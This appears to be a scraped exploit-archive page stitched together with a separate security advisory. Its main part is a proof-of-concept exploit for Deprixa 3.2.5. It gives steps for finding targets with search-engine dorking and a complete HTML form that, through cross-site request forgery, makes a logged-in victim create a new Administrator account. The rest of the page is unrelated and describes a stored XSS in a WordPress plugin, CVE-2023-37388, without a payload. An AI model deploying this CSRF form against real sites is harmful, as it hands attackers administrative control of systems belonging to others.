*   UDP (893)
*   Virus (664)
*   Vulnerability (31,767)
*   Web (9,662)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,930)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,423)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,805)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,572)
*   Other

Desenvolvido C3iM CMS 2.0 Cross Site Scripting

Deprixa version 3.2.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Deprixa 3.2.5 CSRF Vulnerability                                                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              |   
| # Vendor    : https://themes-dl.com/nulled-courier-deprixa-pro-integrated-web-system-v3-2-5-free-download/                       |    
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 11.

[+] Set the target site link Save changes and apply . 

[+] infected file : /dashboard/settings/addusersadmin/agregar.php.

   
          <div class="modal fade" id="nuevo" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">  
            <div class="modal-dialog">  
            <div class="modal-content">  
              <div class="modal-header">  
              <button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">&times;</span><span class="sr-only">Close</span></button>  
              <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i>New Administrator</h4>  
              </div>  
              <div class="modal-body">  
                
                <form action="https://127.0.0.1/deprixalogisticsonline/dashboard/settings/addusersadmin/agregar.php"  data-parsley-validate novalidate method="post" class="form-horizontal" enctype="multipart/form-data">  
                  <div class="form-group " id="gnombrepa">  
                  <label for="off_name" class="col-sm-2 control-label"></label>  
                  <div class="col-sm-10">  
                    <input type="text" class="form-control off_name" parsley-trigger="change" required name="name_parson"  placeholder="Administrator Name">  
                  </div>  
                  </div>  
                  <div class="form-group" id="gapellido">  
                  <label for="email" class="col-sm-2 control-label">Email</label>  
                  <div class="col-sm-5">  
                    <input type="text" class="form-control email" name="email"  id="id_mail" placeholder="demo@demo.com" required onKeyUp="javascript:validateMail('id_mail')">  
                    <strong><span id="emailOK"></span></strong>  
                  <p class="error"></p>  
                  </div>  
                  <div class="col-sm-5">  
                    <input class="form-control phone" name="phone" parsley-trigger="change" required placeholder="Phone">                                        
                  </div>  
                  </div>  
                  <div class="form-group" id="gemail">  
                  <label for="office" class="col-sm-2 control-label">Office</label>  
                  <div class="col-sm-5">  
                    <input type="text" class="form-control office" parsley-trigger="change" required name="office"  placeholder="Name of the Office">  
                  </div>  
                  <div class="col-sm-5">  
                  <select type="text" class="form-control role" name="role" >  
                    <option value="Administrator">Administrator</option>                        
                  </select>  
                  </div>  
                  </div>  
                  <div class="form-group " id="gnombre">  
                  <label for="off_name" class="col-sm-2 control-label">User</label>  
                  <div class="col-sm-10">  
                    <input type="text" class="form-control off_name" parsley-trigger="change" required name="name"  placeholder="Username">  
                  </div>  
                  </div>  
                  <div class="form-group" id="gpassword">  
                  <label for="pwd" class="col-sm-2 control-label">Password</label>  
                  <div class="col-sm-10">  
                    <input type="text" class="form-control pwd" parsley-trigger="change" required name="pwd"  placeholder="Password">  
                  </div>  
                  </div>  
                  </br></br>  
                  <div class="col-sm-offset-2 col-sm-10">  
                    <div class="checkbox">  
                      <label class="i-checks i-checks-sm">  
                      <input type="checkbox" name="estado" value="1" onclick="return false" checked >  
                      <i></i>  
                      State                      </label>  
                    </div>  
                    <div class="checkbox">  
                      <label class="i-checks i-checks-sm">  
                      <input type="checkbox" name="type" value="a" onclick="return false" checked >  
                      <i></i>  
                      User Type                      </label>  
                    </div>  
                  </div>

                                      
                </div>  
                 </br></br>  
                <div class="modal-footer">  
                  <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>  
                    Close</button>  
                  <input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">  
                </div>  
              </form>                                
            </div>  
            </div>  
          </div>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Deprixa 3.2.5 Cross Site Request Forgery

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Sudipto Pratap Mahato Simple Light Weight Social Share plugin <= 2.0 versions.

**Solution**

 No fix

No patched version is available. No reply from the vendor.

Found this useful? Thank Yuki Haruma for reporting this vulnerability. Buy a coffee ☕

Yuki Haruma discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Simple Light Weight Social Share (Tweet, Like, Share and Linkedin) Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-37388: WordPress Simple Light Weight Social Share (Tweet, Like, Share and Linkedin) plugin <= 2.0 - Cross Site Scripting (XSS) vulnerability - Patchstack

Tag

#web